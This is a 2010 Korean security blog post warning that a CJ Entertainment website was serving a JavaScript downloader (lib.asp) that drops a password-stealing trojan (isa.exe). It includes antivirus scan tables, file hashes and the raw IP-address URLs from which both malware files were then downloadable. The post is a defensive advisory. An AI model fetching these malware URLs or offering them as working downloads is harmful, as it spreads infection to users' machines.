ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 53248 bytes
MD5...: 7a605076c916dbe48c3e4dd67411a643
SHA1..: f64ee054a392de9e98f3f8b22fe7d5c39e18bc37
SHA256: 4b9a72252ab86d78c804287400ddff1e0b31c7de5b8b6c523d2953856f844dd0
검사 파일: 1.exe_xor 전송 시각: 2010.05.17 01:32:39 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 ASD.Prevention
AntiVir 8.2.1.242 2010.05.16 TR/Downloader.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Rootkit-gen
Avast5 5.0.332.0 2010.05.16 Win32:Rootkit-gen
AVG 9.0.0.787 2010.05.16 Win32/PEPatch.BM
BitDefender 7.2 2010.05.17 Generic.Malware.FBg.5DCBA1EB
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 Trojan.PWS.Wsgame.20571
eSafe 7.0.17.0 2010.05.16 Suspicious File
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Generic.Malware.FBg.5DCBA1EB
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Win32:Rootkit-gen
Ikarus T3.1.1.84.0 2010.05.17 Win32.SuspectCrc
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 -
McAfee 5.400.0.1158 2010.05.17 Suspect-02!4C073148EB0A
McAfee-GW-Edition 2010.1 2010.05.16 Artemis!4C073148EB0A
Microsoft 1.5703 2010.05.17 Trojan:Win32/Meredrop
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 Suspicious file
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 -
Sophos 4.53.0 2010.05.17 Mal/Behav-112
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Cryptor.Win32.Krap
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
추가 정보
File size: 20480 bytes
MD5...: 4c073148eb0ada6ca31e43816d1d402c
SHA1..: c02449696c974ddde708f3e7afc1c573380e99c5
SHA256: 4ec7b8fa64f0cffa559c0f765816f99426bb5f6b1f8341d87e01b5439afed77f

 관련글 : 프루나 무비서치 악성코드 유포중 !!

댓글을 달아 주세요

posted by Kwan's 2010. 5. 12. 18:20
3주전 발견했던 CJ 엔터 테인먼트가 현재 까지도 악성코드를 가지고 있어서 이렇게 글을 올린다.
프로그램으로 본 결과 악성 코드인 lib.asp 를 삽입되어 있는 모습을 이와 같이 볼수있다.



JS 파일 안에 lib.asp 라는 파일을 확인을 할 수가 있을것이다. 이것은 역시 익스플로러로 들어갈시에 time out 이라는 문구를 보내며 위장하고 있는 사실을 볼 수 가 있다.
이 파일을 다시 복호화 과청을 걸친다면 최종 파일인 exe 가 볼수있다.
이글을 쓰는 지금 이시각도 유포중에 있으며 이 사이트를 매우 조심해야 할 필요가있다.

현재 최종파일도 받는 서버가 살아 있으므로 이 곳을 매우 조심해야한다.

lib.asp : http://61.100.7.171/cxx/lib.asp0
최종파일 : http://61.100.1.93/cxx/isa.exe0

현재도 다운을 받을 수 있으며 마지막으로 이 사이트에 대해서는 조심하자!

검사 파일: lib.asp 전송 시각: 2010.05.10 00:38:59 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.05.09.00 2010.05.08 JS/Downloader
AntiVir 8.2.1.236 2010.05.09 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.05.07 -
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.09 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.09 Script/Exploit
BitDefender 7.2 2010.05.10 Trojan.Script.407264
CAT-QuickHeal 10.00 2010.05.08 -
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 -
DrWeb 5.0.2.03300 2010.05.10 -
eSafe 7.0.17.0 2010.05.09 -
eTrust-Vet None 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.10 Trojan.Script.407264
Fortinet 4.1.133.0 2010.05.09 -
GData 21 2010.05.10 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.05.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.05.09 -
Kaspersky 7.0.0.125 2010.05.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.05.09 -
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.09 -
NOD32 5099 2010.05.10 -
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Script.407264
Panda 10.0.2.7 2010.05.09 -
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 -
Rising 22.46.06.04 2010.05.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.09 JS/Agent-MZX
Sunbelt 6283 2010.05.10 -
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.09 -
TrendMicro 9.120.0.1004 2010.05.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 -
VBA32 3.12.12.4 2010.05.06 -
ViRobot 2010.5.8.2306 2010.05.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.05.09 -
 
추가 정보
File size: 5851 bytes
MD5   : 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1  : e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.05.10 00:46:48 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Trojan.Peed!IK
AhnLab-V3 2010.05.09.00 2010.05.08 Win-Trojan/Pincav.54784.U
AntiVir 8.2.1.236 2010.05.09 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.07 Trojan/Win32.Pincav.gen
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.09 Win32:Malware-gen
AVG 9.0.0.787 2010.05.09 Generic17.BKEJ
BitDefender 7.2 2010.05.10 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.08 Trojan.Pincav.ywu
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.10 Trojan.Siggen1.24430
eSafe 7.0.17.0 2010.05.09 Win32.PWS.Mmorpg
eTrust-Vet 35.2.7474 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.09 W32/Pincav.YWU!tr
GData 21 2010.05.10 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.10 Trojan.Peed
Jiangmin 13.0.900 2010.05.09 Trojan/Pincav.eta
Kaspersky 7.0.0.125 2010.05.09 Trojan.Win32.Pincav.ywu
McAfee 5.400.0.1158 2010.05.09 PWS-Mmorpg!oq
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.09 Trojan:Win32/Malagent
NOD32 5099 2010.05.10 Win32/PSW.Gamania.NCP
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.09 Generic Trojan
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 High Risk Cloaked Malware
Rising 22.46.06.04 2010.05.09 Trojan.Win32.Generic.5202C6D7
Sophos 4.53.0 2010.05.09 Troj/Dload-HL
Sunbelt 6283 2010.05.10 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 Trojan/Pincav.ywu
TrendMicro 9.120.0.1004 2010.05.09 TSPY_MAGANIA.KI
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 TSPY_MAGANIA.KI
VBA32 3.12.12.4 2010.05.06 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.8.2306 2010.05.09 Trojan.Win32.Pincav.54784.C
VirusBuster 5.0.27.0 2010.05.09 Trojan.PWS.Gamania.BBV
 
추가 정보
File size: 54784 bytes
MD5...: a19b540af7132a86e866be1152256f07
SHA1..: 77715cc29b8911598f5f43bb0b17687267ea75f5
SHA256: 1d109b0ebfebc3d3c960bb7e4ef2917d64c4fef515ab031f1f15d522f0aa7fde

box.exe ~> V3 : Win-Trojan/Magania.53248.AA(추가 : 2010.05.07.07)
isa.exe ~> V3 : Win-Trojan/Pincav.54784.U(추가 : 2010.05.01.00)

이와 같이 현재는 대부분의 신고로 모두 백신이 잡는다는 것을 볼수있다.
이런 사이트는 안전한 상태가 아니면 피하는것이 좋다고 볼수있다.
호기심에 실행시켜서 얻는 불이익은 모두 실행시킨분의 책임입니다.


댓글을 달아 주세요